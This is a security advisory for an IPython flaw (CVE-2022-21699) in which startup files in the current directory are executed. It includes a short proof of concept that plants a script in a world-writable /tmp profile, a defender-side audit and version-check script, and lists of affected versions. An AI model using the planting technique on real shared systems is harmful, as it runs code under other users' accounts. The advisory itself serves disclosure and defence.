GHSA-pq7m-3gw7-gq5x

Source
https://github.com/advisories/GHSA-pq7m-3gw7-gq5x
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-pq7m-3gw7-gq5x/GHSA-pq7m-3gw7-gq5x.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-pq7m-3gw7-gq5x
Aliases
Published
2022-01-21T18:55:30Z
Modified
2024-09-27T18:52:53.914048Z
Severity
  • 8.2 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
  • 8.5 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P
Summary
Execution with Unnecessary Privileges in ipython
Details

We’d like to disclose an arbitrary code execution vulnerability in IPython that stems from IPython executing untrusted startup files found in the current working directory (CWD). This vulnerability allows one user to run code as another user who starts IPython from a directory the first user controls.

Proof of concept

User1:

mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py

User2:

cd /tmp
ipython

User2 will see:

Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help.
stealing your private secrets

Patched release and documentation

See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699.

Versions 8.0.1 and 7.31.1 are recommended for current Python versions. Version 7.16.3 has also been published for Python 3.6 users, and version 5.11 (source only, on the 5.x branch on GitHub) for older Python versions.
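As an added, defender-side example (not code from the advisory or from the IPython project), the following script does two things a practitioner reading this advisory would want: it audits the current working directory for a `profile_default/startup` tree that an unpatched IPython would execute, flagging world-writable path components or files owned by another user (the setup the proof of concept above relies on), and it compares an IPython version string against the affected ranges listed on this page. It assumes IPython's documented behaviour of running `*.py` and `*.ipy` files from a profile's startup directory, uses a simplified version ordering that is sufficient for the versions named here, and all function names are the example's own.

```python
"""Defender-side checks for the IPython CWD startup-file issue (GHSA-pq7m-3gw7-gq5x).

Example code added to this advisory page; not part of IPython or the advisory.

  1. audit_startup_dir(cwd): report startup scripts that an unpatched IPython
     would execute from <cwd>/profile_default/startup, with the reasons they
     are suspicious (world-writable path components, foreign ownership).
  2. is_affected(version): compare an IPython version string against the
     affected ranges listed in the advisory.
"""
import os
import re
import stat
from pathlib import Path

# Affected ranges taken from the advisory: [introduced, fixed).
# None as the lower bound means "all earlier versions are affected".
AFFECTED_RANGES = [
    (None, "5.11"),
    ("6.0.0", "7.16.3"),
    ("7.17.0", "7.31.1"),
    ("8.0.0", "8.0.1"),
]

_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(.*)$")


def version_key(version):
    """Sortable key: numeric release parts padded to four, then a pre-release flag.

    Suffixes such as 'b1' or 'rc2' sort before the final release of the same
    number; any other suffix is treated as a final release. This is a
    simplified ordering (an assumption of this example), enough for the
    versions named on the advisory page.
    """
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    parts += [0] * (4 - len(parts))
    suffix = m.group(2).lstrip(".-")
    prerelease = suffix.startswith(("a", "b", "rc"))
    return (tuple(parts[:4]), 0 if prerelease else 1)


def is_affected(version):
    """True if `version` falls inside any affected range of the advisory."""
    k = version_key(version)
    for introduced, fixed in AFFECTED_RANGES:
        lower_ok = introduced is None or k >= version_key(introduced)
        if lower_ok and k < version_key(fixed):
            return True
    return False


def audit_startup_dir(cwd):
    """List startup scripts under <cwd>/profile_default/startup with risk reasons.

    Returns a list of (path, reasons) tuples. IPython runs *.py and *.ipy files
    from a profile's startup directory; before the fix it also picked up a
    profile located in the current working directory, which is what we audit.
    """
    startup = Path(cwd) / "profile_default" / "startup"
    if not startup.is_dir():
        return []
    my_uid = os.geteuid() if hasattr(os, "geteuid") else None
    findings = []
    for script in sorted(startup.iterdir()):
        if script.suffix not in (".py", ".ipy") or not script.is_file():
            continue
        reasons = []
        # Inspect the profile dir, the startup dir and the script itself:
        # any of them being writable by or owned by another user is enough.
        for p in (startup.parent, startup, script):
            st = p.stat()
            if st.st_mode & stat.S_IWOTH:
                reasons.append(f"{p.name} is world-writable")
            if my_uid is not None and st.st_uid != my_uid:
                reasons.append(f"{p.name} is owned by uid {st.st_uid}, not you")
        findings.append((str(script), reasons))
    return findings


if __name__ == "__main__":
    for path, reasons in audit_startup_dir(os.getcwd()):
        print(f"startup script in CWD would be executed by unpatched IPython: {path}")
        for r in reasons:
            print(f"  - {r}")
    try:
        from importlib.metadata import version as pkg_version
        v = pkg_version("ipython")
        state = "AFFECTED" if is_affected(v) else "not in the affected ranges"
        print(f"installed ipython {v}: {state}")
    except Exception:
        print("ipython not installed (or its metadata is unavailable)")
```

Run it from any directory before starting IPython on a shared host; an empty audit result plus a version outside the affected ranges is the expected state. The ownership check is the more telling of the two signals: a world-writable `profile_default` is the shape used in the proof of concept, but a startup directory simply owned by someone else is just as much a sign that the CWD is not yours to trust.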

Database specific
{
    "nvd_published_at": "2022-01-19T22:15:00Z",
    "cwe_ids": [
        "CWE-250",
        "CWE-269",
        "CWE-279"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2022-01-19T21:26:17Z"
}
References

Affected packages

PyPI / ipython

Affected ranges (type: ECOSYSTEM)

Introduced: 0 (unknown introduced version; all previous versions are affected)
Fixed: 5.11

Affected versions

0.*

0.7.1.fix1
0.7.4.svn.r2010
0.6.4
0.6.5
0.6.6
0.6.7
0.6.8
0.6.9
0.6.10
0.6.11
0.6.12
0.6.13
0.6.14
0.6.15
0.7.0
0.7.1
0.7.2
0.7.3
0.8.0
0.8.1
0.8.2
0.8.3
0.8.4
0.9
0.9.1
0.10
0.10.1
0.10.2
0.11
0.12
0.12.1
0.13
0.13.1
0.13.2

1.*

1.0.0
1.1.0
1.2.0
1.2.1

2.*

2.0.0
2.1.0
2.2.0
2.3.0
2.3.1
2.4.0
2.4.1

3.*

3.0.0
3.1.0
3.2.0
3.2.1
3.2.2
3.2.3

4.*

4.0.0-b1
4.0.0b1
4.0.0
4.0.1
4.0.2
4.0.3
4.1.0rc1
4.1.0rc2
4.1.0
4.1.1
4.1.2
4.2.0
4.2.1

5.*

5.0.0b1
5.0.0b2
5.0.0b3
5.0.0b4
5.0.0rc1
5.0.0
5.1.0
5.2.0
5.2.1
5.2.2
5.3.0
5.4.0
5.4.1
5.5.0
5.6.0
5.7.0
5.8.0
5.9.0
5.10.0

PyPI / ipython

Affected ranges (type: ECOSYSTEM)

Introduced: 6.0.0
Fixed: 7.16.3

Affected versions

6.*

6.0.0
6.1.0
6.2.0
6.2.1
6.3.0
6.3.1
6.4.0
6.5.0

7.*

7.0.0b1
7.0.0rc1
7.0.0
7.0.1
7.1.0
7.1.1
7.2.0
7.3.0
7.4.0
7.5.0
7.6.0
7.6.1
7.7.0
7.8.0
7.9.0
7.10.0
7.10.1
7.10.2
7.11.0
7.11.1
7.12.0
7.13.0
7.14.0
7.15.0
7.16.0
7.16.1
7.16.2

PyPI / ipython

Affected ranges (type: ECOSYSTEM)

Introduced: 7.17.0
Fixed: 7.31.1

Affected versions

7.*

7.17.0
7.18.0
7.18.1
7.19.0
7.20.0
7.21.0
7.22.0
7.23.0
7.23.1
7.24.0
7.24.1
7.25.0
7.26.0
7.27.0
7.28.0
7.29.0
7.30.0
7.30.1
7.31.0

PyPI / ipython

Affected ranges (type: ECOSYSTEM)

Introduced: 8.0.0
Fixed: 8.0.1

Affected versions

8.*

8.0.0